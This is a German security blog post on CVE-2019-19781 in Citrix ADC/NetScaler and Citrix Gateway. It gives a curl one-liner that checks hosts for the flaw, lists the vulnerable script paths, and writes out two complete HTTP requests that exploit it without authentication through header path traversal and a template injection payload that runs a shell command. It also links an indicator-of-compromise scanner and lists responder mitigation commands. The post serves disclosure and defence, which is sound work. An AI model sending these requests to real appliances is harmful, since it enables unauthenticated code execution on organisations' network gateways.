
CVE-2019-19781 - Exploit für Remotecodeausführung auf Citrix ADC Netscaler
Remote Code Execution (RCE) in Citrix Application Delivery Controller und Citrix Gateway
Es wurde eine Schwachstelle in Citrix Application Delivery Controller (ADC), früher bekannt als NetScaler ADC, und Citrix Gateway, früher bekannt als NetScaler Gateway, identifiziert, die bei Ausnutzung einem nicht authentifizierten Angreifer die Ausführung beliebigen Codes ermöglichen könnte.
EDIT: Indicator of Compromise-Scanner für CVE-2019-19781 von Fireeye -> https://github.com/fireeye/ioc-scanner-CVE-2019-19781/
Betroffene Produkte:

TARGET=your_ip
curl -vk –path-as-is https://$TARGET/vpn/../vpns/ 2>&1 | grep “You don’t have permission to access /vpns/” >/dev/null && echo “VULNERABLE: $TARGET” || echo “MITIGATED: $TARGET”
POST /vpn/../vpns/portal/scripts/newbm.pl
POST /vpn/../vpns/portal/scripts/rmbm.pl
GET /vpn/../vpns/portal/scripts/picktheme.pl
Es sind nur zwei Requests nötig, um diese Schwachstelle ohne jegliche Authentifizierung auszunutzen!
Erster Request:
POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1
Host: 3.81.59.87
NSC_USER: ../../../../netscaler/portal/templates/randomletter
NSC_NONCE: c
Connection: close
Content-Length: 103
url=http://exemple.com&title=[%t=template.new({'BLOCK'='print `uname -a`'})%][% t %]&desc=test&UI_inuse=RfWeb
Zweiter Request:
GET /vpns/portal/bonclay4.xml HTTP/1.1
Host: 3.81.59.87
NSC_USER: ../../../../netscaler/portal/templates/randomletter
NSC_NONCE: c
Connection: close

enable ns feature responder
add responder action respondwith403 respondwith "\"HTTP/1.1 403 Forbidden\r\n\r\n\""
add responder policy ctx267027 "HTTP.REQ.URL.DECODE_USING_TEXT_MODE.CONTAINS(\"/vpns/\") && (!CLIENT.SSLVPN.IS_SSLVPN || HTTP.REQ.URL.DECODE_USING_TEXT_MODE.CONTAINS(\"/../\"))" respondwith403
bind responder global ctx267027 1 END -type REQ_OVERRIDE
save config